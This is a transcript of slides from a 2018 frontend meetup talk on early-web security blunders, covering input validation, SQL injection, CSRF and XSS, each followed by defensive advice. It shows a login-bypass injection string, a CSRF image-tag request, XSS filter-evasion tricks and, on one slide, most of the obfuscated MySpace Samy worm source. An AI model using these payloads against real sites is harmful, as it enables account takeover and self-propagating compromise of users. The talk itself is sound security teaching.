Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Securing your site like it's 1999

Frontend NE
August 02, 2018
Technology
0
200

Securing your site like it's 1999

For our next event we are super excited to welcome npm’s Katie Fenn, she will be joining us to talk about ‘Securing your site like it’s 1999’!

Life in the early days of the web was hard. One day your HTML is disintegrating, the next you are fighting someone named “~Ninjad00d~” who has found a way to take over your forum system. Lessons in security in these days were hard learned.

These are the true stories from the early days of the web and how forums, chat rooms and online games were turned upside down for fun and profit. If you stick around after laughing at the misfortune of online pioneers, there will also be lessons about finding your way in a world that wants to exploit your every mistake.

Frontend NE

August 02, 2018
Tweet

More Decks by Frontend NE

See All by Frontend NE
Standardizing 'select': What the future holds for HTML - Stephanie Stimac @ FrontendNE
frontendne
4
220
CSS Regression testing - James A Lambert @ FrontendNE
frontendne
1
200
Building a design system for Lloyds Banking - Lilly Dart @ FrontendNE
frontendne
0
940
What I learnt about hiring diverse teams from conducting a fully-anonymous recruitment process - Bethan Vicent
frontendne
0
140
Web Design that Doesn't Make Trans People Uncomfortable - Jessica Kelsall
frontendne
0
530
Contain yourself - Docker for developers
frontendne
2
160
Design process of a website
frontendne
0
140
What the JAMstack?
frontendne
1
610
Talking the talk
frontendne
0
310

Other Decks in Technology

See All in Technology
Cloud Native Java with Spring Boot (CNCF Aarhus, April 2024)
thomasvitale
1
170
ChatGPT for IT Service Management (IT Pro)
dahatake
7
1.6k
Google Cloud Next '24でブログを10本書いた方法と勉強会を沸かせた方法
yasumuusan
0
300
自己改善からチームを動かす! 「セルフエンジニアリングマネージャー」のすゝめ
shoota
6
690
APIファーストなプロダクトマネジメントの実践 〜SaaSus Platformでの例〜 / "Practicing API-First Product Management - An Example with SaaSus Platform
oztick139
0
100
Azureの基本的な権限管理の勉強会
yhana
0
440
IaCジェネレーターとBedrockで詳細設計書を生成してみた
tsukasa_ishimaru
1
180
チームでロジカルシンキングに改めて向き合っている話 〜学習環境と実践⽅法〜
sansantech
PRO
3
2.5k
[新卒向け研修資料] テスト文字列に「うんこ」と入れるな(2024年版)
infiniteloop_inc
4
15k
DevOpsメトリクスとアウトカムの接続にトライ!開発プロセスを通して計測できるメトリクスの活用方法
ham0215
2
240
サーバー間 GraphQL と webmock-graphql の話 / server-to-server graphql and webmock-graphql
qsona
2
190
【NW X Security JAWS#3】L3-4:AWS環境のIPv6移行に向けて知っておきたいこと
shotashiratori
0
160

Featured

See All Featured
Making the Leap to Tech Lead
cromwellryan
124
8.5k
How GitHub Uses GitHub to Build GitHub
holman
468
290k
Building Effective Engineering Teams - LeadDev
addyosmani
28
1.8k
5 minutes of I Can Smell Your CMS
philhawksworth
199
19k
StorybookのUI Testing Handbookを読んだ
zakiyama
13
4.6k
What the flash - Photography Introduction
edds
64
11k
GraphQLの誤解/rethinking-graphql
sonatard
50
9.2k
A designer walks into a library…
pauljervisheath
200
23k
I Don’t Have Time: Getting Over the Fear to Launch Your Podcast
jcasabona
21
1.6k
Code Review Best Practice
trishagee
55
15k
Designing Experiences People Love
moore
136
23k
Building an army of robots
kneath
300
41k

Transcript

  1. SECURING YOUR SITE LIKE it’s 1999

  2. SECURING YOUR SITE LIKE it’s 1999

  3. @katie_fenn tell me what you think!

  4. @katie_fenn cw: large animated image content warnings

  5. Hi, I’m Katie

  6. None

  7. @katie_fenn

  8. @katie_fenn

  9. @katie_fenn post signatures: jamaal10 Post signatures

  10. @katie_fenn post signatures: jamaal10

  11. @katie_fenn

  12. @katie_fenn HTML Bombs

  13. @katie_fenn TRUSTING ANY OLD CRAP THE USER SENDS YOU

  14. @katie_fenn ALSO KNOWN As...

  15. BAD INPUT VALIDATION

  16. @katie_fenn

  17. @katie_fenn Username Tom Nook Password **************************** Edit user Email address

    [email protected]

  18. @katie_fenn Username Tom Nook Edit user Email address [email protected] User

    ID 349 Password ****************************

  19. @katie_fenn Username Tom Nook Edit user Email address [email protected] User

    ID 349 Password ****************************

  20. @katie_fenn Username Tom Nook Edit user Email address [email protected] User

    ID 1 Password hunter2

  21. @katie_fenn

  22. @katie_fenn

  23. Never ever trust user input

  24. Never ever trust user input

  25. @katie_fenn ALWAYS Ask yourSelf how the user can use a

    feature for fun and profit

  26. @katie_fenn INPUT validation • use a library like joi to

    validate data

  27. @katie_fenn INPUT validation • use a library like joi to

    validate data • check a user’s actions against their identity

  28. @katie_fenn INPUT validation • use a library like joi to

    validate data • check a user’s actions against their identity • never rely on client-side validation cw: large animated image

  29. @katie_fenn InTERMISSION

  30. @katie_fenn InTERMISSION

  31. @katie_fenn Username SephirothIsMyBishie Password Login Correct Horse Battery Staple

  32. @katie_fenn Username SephirothIsMyBishie Password Login Correct Horse Battery Staple cw:

    large animated image

  33. @katie_fenn Username SephirothIsMyBishie Password Login You are now logged in!

    Welcome Admin! ' OR '1'='1 cw: large animated image

  34. @katie_fenn Allowing the user to run their own Database queries

    ALSO known as...

  35. @katie_fenn Allowing the user to run their own Database queries

    ALSO known as...

  36. SQL INJECTION

  37. @katie_fenn Username Password Login /* SQL */ SELECT COUNT(*) FROM

    USERS WHERE USERNAME = AND PASSWORD = ‘’ ‘’

  38. @katie_fenn Username Password Login /* SQL */ SELECT COUNT(*) FROM

    USERS WHERE USERNAME = AND PASSWORD =

  39. @katie_fenn Username Alice Password Login /* SQL */ SELECT COUNT(*)

    FROM USERS WHERE USERNAME = AND PASSWORD = ‘Alice’ hunter2 ‘hunter2’ You are now logged in! Welcome Alice! > 1

  40. @katie_fenn Username Password Login /* SQL */ SELECT COUNT(*) FROM

    USERS WHERE USERNAME = AND PASSWORD =

  41. @katie_fenn Username Password Login /* SQL */ SELECT COUNT(*) FROM

    USERS WHERE USERNAME = AND PASSWORD = ‘’ ‘’

  42. @katie_fenn Username Password Login /* SQL */ SELECT COUNT(*) FROM

    USERS WHERE USERNAME = AND PASSWORD =

  43. @katie_fenn Username Password Login /* SQL */ SELECT COUNT(*) FROM

    USERS WHERE USERNAME = AND PASSWORD = Admin ' OR ‘1'='1 ‘Admin’ ‘’ OR ‘1’=‘1’ You are now logged in! Welcome Admin! > 349

  44. @katie_fenn Username Alice Password Login Admin ' OR ‘1'='1 ‘Admin’

    ‘’ OR ‘1’=‘1’ /* SQL */ SELECT COUNT(*) FROM USERS WHERE USERNAME = AND PASSWORD = SQL: Give me all the users that have the username “Admin”

  45. @katie_fenn Username Alice Password Login /* SQL */ SELECT COUNT(*)

    FROM USERS WHERE USERNAME = AND PASSWORD = Admin ‘Admin’ ‘’ OR ‘1’=‘1’ SQL: … or TRUE

  46. @katie_fenn Username Alice Password Login /* SQL */ SELECT COUNT(*)

    FROM USERS WHERE USERNAME = AND PASSWORD = Admin ‘Admin’ ‘’ OR ‘1’=‘1’ ' OR ‘1'='1 SQL: … or TRUE

  47. @katie_fenn GIVE me all the users with the username “admin”

    OR whatever you’ve got I guess

  48. SQL INJECTION hands the keys to YOUR database to the

    user

  49. @katie_fenn DRUPALGEDDON •affected every Drupal 7 site before version 7.32

  50. @katie_fenn DRUPALGEDDON •affected every Drupal 7 site before version 7.32

    •remote code execution

  51. @katie_fenn DRUPALGEDDON •affected every Drupal 7 site before version 7.32

    •remote code execution •in some cases patched vulnerability to hide breach

  52. @katie_fenn SQL INJECTION •never build sql queries using string concatenation

  53. @katie_fenn SQL INJECTION •never build sql queries using string concatenation

    •use parameterised queries (pdo, knex)

  54. @katie_fenn SQL INJECTION •never build sql queries using string concatenation

    •use parameterised queries (pdo, knex) •use an orm

  55. @katie_fenn Bonus story cw: full screen video

  56. @katie_fenn cw: large animated image

  57. @katie_fenn cw: large animated image

  58. @katie_fenn InTERMISSION

  59. @katie_fenn InTERMISSION

  60. @katie_fenn

  61. @katie_fenn

  62. @katie_fenn

  63. @katie_fenn

  64. @katie_fenn

  65. @katie_fenn Getting other users to do your dirty work for

    you

  66. @katie_fenn ALSO KNOWN As...

  67. CROSS-SITE REQUEST FORGERY

  68. @katie_fenn

  69. @katie_fenn cw: video

  70. @katie_fenn cw: video

  71. @katie_fenn

  72. @katie_fenn

  73. @katie_fenn Look, it’s a kitten on a bike!

  74. @katie_fenn <img src=“http://www.netflix.com/JSON/AddToQueue?movieid=70110672" width=“1" height=“1" border="0">

  75. CSRF exploits the trust between website and browser

  76. @katie_fenn Cross site request forgery •verify origin or referer http

    headers

  77. @katie_fenn Cross site request forgery •verify origin or referer http

    headers •use synchroniser tokens

  78. @katie_fenn <input type=“hidden" name=“csrfmiddlewaretoken" value="KbyUmhTLMpYj7CD2di7JKP1P3qmLlkPt" />

  79. @katie_fenn Cross site request forgery •verify origin or referer http

    headers •use synchroniser tokens •use cookie-to-header tokens

  80. @katie_fenn Cross site request forgery •verify origin or referer http

    headers •use synchroniser tokens •use cookie-to-header tokens •no defence if compromised by xss cw: large animated image

  81. @katie_fenn InTERMISSION

  82. @katie_fenn InTERMISSION

  83. @katie_fenn New reply

  84. @katie_fenn New reply [img]sephiroth.gif[/img]

  85. @katie_fenn

  86. @katie_fenn

  87. @katie_fenn New reply

  88. @katie_fenn New reply [img]guild.gif[url=][/img][/url]

  89. @katie_fenn 
 *~*Ninjad00d*~* /a>

  90. @katie_fenn 
 *~*Ninjad00d*~* /a>

  91. @katie_fenn 
 *~*Ninjad00d*~* /a>

  92. @katie_fenn 
 *~*Ninjad00d*~* /a>

  93. @katie_fenn 
 *~*Ninjad00d*~* /a onload>

  94. @katie_fenn 
 *~*Ninjad00d*~* /a onload>

  95. @katie_fenn 
 *~*Ninjad00d*~* /a onload>

  96. @katie_fenn 
 *~*Ninjad00d*~* /a onload>

  97. @katie_fenn ololoololololololololololololololololololololololololololololololo lololololololololololoolololololololololololololololololololololol olololololololololololololololololololoolololololololololololololo lolololololololololololololololololololololololololololoololololol ololololololololololololololololololololololololololololololololol olololoolololololololololololololololololololololololololololololo lolololololololololololoololololololololololololololololololololol ololololololololololololololololololololoololololololololololololo lololololololololololololololololololololololololololololoolololol

    ololololololololololololololololololololololololololololololololol ololololoololololololololololololololololololololololololololololo lololololololololololololoolololololololololololololololololololol olololololololololololololololololololololoolololololololololololo lolololololololololololololololololololololololololololololoololol ololololololololololololololololololololololololololololololololol olololololoolololololololololololololololololololololololololololo lolololololololololololololo 
 RoflLaz0rz wth is going on

  98. @katie_fenn Someone else’s code running on your website

  99. @katie_fenn ALSO KNOWN As...

  100. CROSS-SITE SCRIPTING

  101. @katie_fenn SAMY Kamkar

  102. @katie_fenn Samy Male CALIFORNIA United States Home | Browse |

    Search | Invite | Film | Mail | Blog | Favorites Can we be friends? MySpace.com

  103. @katie_fenn Samy Male CALIFORNIA United States Home | Browse |

    Search | Invite | Film | Mail | Blog | Favorites Can we be friends? MySpace.com

  104. @katie_fenn Samy Male CALIFORNIA United States Home | Browse |

    Search | Invite | Film | Mail | Blog | Favorites Can we be friends? MySpace.com

  105. @katie_fenn Samy Male CALIFORNIA United States Home | Browse |

    Search | Invite | Film | Mail | Blog | Favorites Can we be friends? MySpace.com

  106. @katie_fenn Samy Male CALIFORNIA United States Home | Browse |

    Search | Invite | Film | Mail | Blog | Favorites Can we be friends? MySpace.com <div> and <img> tags allowed, but <script> is filtered

  107. @katie_fenn <div style="background:url('javascript:alert(1)')">

  108. @katie_fenn <div style="background:url('javascript:alert(1)')"> Some browsers executed JS inside style properties!

  109. @katie_fenn <div style="background:url('javascript:alert(1)')">

  110. @katie_fenn MySpace filtered the word “javascript” <div style="background:url('javascript:alert(1)')">

  111. @katie_fenn <div style=“background:url('java script:alert(1)')">

  112. @katie_fenn Line breaks? No problem! <div style=“background:url('java script:alert(1)')">

  113. @katie_fenn alert('hah!')

  114. @katie_fenn alert(document.body.innerHTML)

  115. @katie_fenn alert(eval('document.body.inne' + 'rHTML'))

  116. @katie_fenn alert(eval('document.body.inne' + 'rHTML')) Not a problem if you concatenate

    a string and evaluate with eval

  117. @katie_fenn alert(eval('document.body.inne' + ‘rHTML')) eval('XMLHttpRequest.onread' + 'ystatechange = callback');

  118. @katie_fenn alert(eval('document.body.inne' + ‘rHTML')) eval('XMLHttpRequest.onread' + 'ystatechange = callback'); This

    trick also works for XMLHttpRequest.onReadyStateChange (also known as “AJAX”)

  119. @katie_fenn if (location.hostname == 'profile.myspace.com') { document.location = 'http://www.myspace.com' +

    location.pathname + location.search }

  120. @katie_fenn if (location.hostname == 'profile.myspace.com') { document.location = 'http://www.myspace.com' +

    location.pathname + location.search } Browsers restrict requests to domains of different origin. Changing location worked around this.

  121. @katie_fenn <div id=mycode style="BACKGROUND: url('java script:eval(document.all.mycode.expr)')" expr="var B=String.fromCharCode(34);var A=String.fromCharCode(39);function g(){var

    C;try{var D=document.body.createTextRange();C=D.htmlText}catch(e){}if(C){return C}else{return eval('document.body.inne'+'rHTML')}}function getData(AU {M=getFromURL(AU,'friendID');L=getFromURL(AU,'Mytoken')}function getQueryParams(){var E=document.location.search;var F=E.substring(1,E.leng AS=new Array();for(var O=0;O<F.length;O++){var I=F[O].split('=');AS[I[0]]=I[1]}return AS}var J;var AS=getQueryParams();var L=AS['Mytoken']; M=AS['friendID'];if(location.hostname=='profile.myspace.com'){document.location='http://www.myspace.com'+location.pathname+location.search}e {getData(g())}main()}function getClientFID(){return findIn(g(),'up_launchIC( '+A,A)}function nothing(){}function paramsToString(AV){var N=ne O=0;for(var P in AV){if(O>0){N+='&'}var Q=escape(AV[P]);while(Q.indexOf('+')!=-1){Q=Q.replace('+','%2B')}while(Q.indexOf('&')!=-1){Q=Q.repl N+=P+'='+Q;O++}return N}function httpSend(BH,BI,BJ,BK){if(!J){return false}eval('J.onr'+'eadystatechange=BI');J.open(BJ,BH,true);if(BJ=='PO {J.setRequestHeader('Content-Type','application/x-www-form-urlencoded');J.setRequestHeader('Content-Length',BK.length)}J.send(BK);return tr findIn(BF,BB,BC){var R=BF.indexOf(BB)+BB.length;var S=BF.substring(R,R+1024);return S.substring(0,S.indexOf(BC))}function getHiddenParameter findIn(BF,'name='+B+BG+B+' value='+B,B)}function getFromURL(BF,BG){var T;if(BG=='Mytoken'){T=B}else{T='&'}var U=BG+'=';var V=BF.indexOf(U)+U W=BF.substring(V,V+1024);var X=W.indexOf(T);var Y=W.substring(0,X);return Y}function getXMLObj(){var Z=false;if(window.XMLHttpRequest){try{ XMLHttpRequest()}catch(e){Z=false}}else if(window.ActiveXObject){try{Z=new ActiveXObject('Msxml2.XMLHTTP')}catch(e){try{Z=new ActiveXObject catch(e){Z=false}}}return Z}var AA=g();var AB=AA.indexOf('m'+'ycode');var AC=AA.substring(AB,AB+4096);var AD=AC.indexOf('D'+'IV');var AE=AC AF;if(AE){AE=AE.replace('jav'+'a',A+'jav'+'a');AE=AE.replace('exp'+'r)','exp'+'r)'+A);AF=' but most of all, samy is my hero. <d'+'iv id='+A AG;function getHome(){if(J.readyState!=4){return}var AU=J.responseText;AG=findIn(AU,'P'+'rofileHeroes','</ td>');AG=AG.substring(61,AG.length);if(AG.indexOf('samy')==-1){if(AF){AG+=AF;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']='Preview';AS['interest']=AG;J=getXMLObj();httpSend('/index.cfm? fuseaction=profile.previewInterests&Mytoken='+AR,postHero,'POST',paramsToString(AS))}}}function postHero(){if(J.readyState!=4){return}var AU AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']='Submit';AS['interest']=AG;AS['hash']=getHiddenParameter(AU,'hash');httpSend('/index.cfm? fuseaction=profile.processInterests&Mytoken='+AR,nothing,'POST',paramsToString(AS))}function main(){var AN=getClientFID();var BH='/index.cfm fuseaction=user.viewProfile&friendID='+AN+'&Mytoken='+L;J=getXMLObj();httpSend(BH,getHome,'GET');xmlhttp2=getXMLObj();httpSend2('/index.cfm? fuseaction=invite.addfriend_verify&friendID=11851658&Mytoken='+L,processxForm,'GET')}function processxForm(){if(xmlhttp2.readyState!=4){ret AU=xmlhttp2.responseText;var AQ=getHiddenParameter(AU,'hashcode');var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['hashcode']=AQ;AS['friendID']='11851658';AS['submit']='Add to Friends';httpSend2('/index.cfm? fuseaction=invite.addFriendsProcess&Mytoken='+AR,nothing,'POST',paramsToString(AS))}function httpSend2(BH,BI,BJ,BK){if(!xmlhttp2){return fa eval('xmlhttp2.onr'+'eadystatechange=BI');xmlhttp2.open(BJ,BH,true);if(BJ=='POST'){xmlhttp2.setRequestHeader('Content-Type','application/x- urlencoded');xmlhttp2.setRequestHeader('Content-Length',BK.length)}xmlhttp2.send(BK);return true}"></DIV>

  122. @katie_fenn Home | Browse | Search | Invite | Film

    | Mail | Blog | Favorites MySpace.com Friend Request Manager From Confirmation Approve Deny Message Listing 1 of 1 Tom

  123. @katie_fenn Home | Browse | Search | Invite | Film

    | Mail | Blog | F MySpace.com Friend Request Manager From Confirmation Approve Deny Message Listing 1 - 10 of 221 Tom @katie_fenn

  124. @katie_fenn Home | Browse | Search | Invite | Film

    | Mail Friend Request Manager From Confirmation Approve Deny Message Listing 1 - 10 of 480 Tom @katie_fenn

  125. @katie_fenn Home | Browse | Search | Invite | Film

    Friend Request Manager From Confirmation Approve Deny Me Listing 1 - 10 of 917,084 Tom @katie_fenn

  126. @katie_fenn @katie_fenn

  127. @katie_fenn One hour later...

  128. @katie_fenn 500 Internal Server Error The server encountered an internal

    error or misconfiguration and was unable to complete your request. Please contact the server administrator, [email protected] and inform them of the time the error occurred, and anything you might have done to cause the error. More information about this error may be found in the server error log.

  129. @katie_fenn SAMY Myspace worm • site restored two hours later

    • raided by u.s. secret service • 90 days community service • $15,000-$20,000 restitution

  130. Xss allows users to inject their own code Into your

    site

  131. @katie_fenn Cross site scripting •escape user input on entry using

    a library

  132. @katie_fenn Cross site scripting •escape user input on entry using

    a library •use an auto-escaping templating library

  133. @katie_fenn Cross site scripting •escape user input on entry using

    a library •use an auto-escaping templating library •implement a content security policy

  134. @katie_fenn Cross site scripting •escape user input on entry using

    a library •use an auto-escaping templating library •implement a content security policy •use sub-resource integrity

  135. @katie_fenn https:/ /flic.kr/p/e8eTA5

  136. @katie_fenn https:/ /flic.kr/p/84VA2k

  137. It’s an important topic but there’s never been a better

    time to learn

  138. Everyone HAs to start somewhere

  139. Special thanks Ben Pottier @bone_idol Cory Foy @irongeek_adc Michael Irwin

    Evan Williams @kitation @lukeb_uk Simon Willison @yesnoornext Justin Safa Steve Christey Coley @dontfeartherepair @SwiftOnSecurity @benofbrown Miriam Wiesner @lucky225 S. VonKetschmann CJ Silverio Lewis Cowper @_gaeel_

  140. @katie_fenn Thank you @katie_fenn www.katiefenn.co.uk slides: bit.ly/kf-scotlandjs-2018

  141. @katie_fenn Thank you @katie_fenn www.katiefenn.co.uk slides: bit.ly/kf-scotlandjs-2018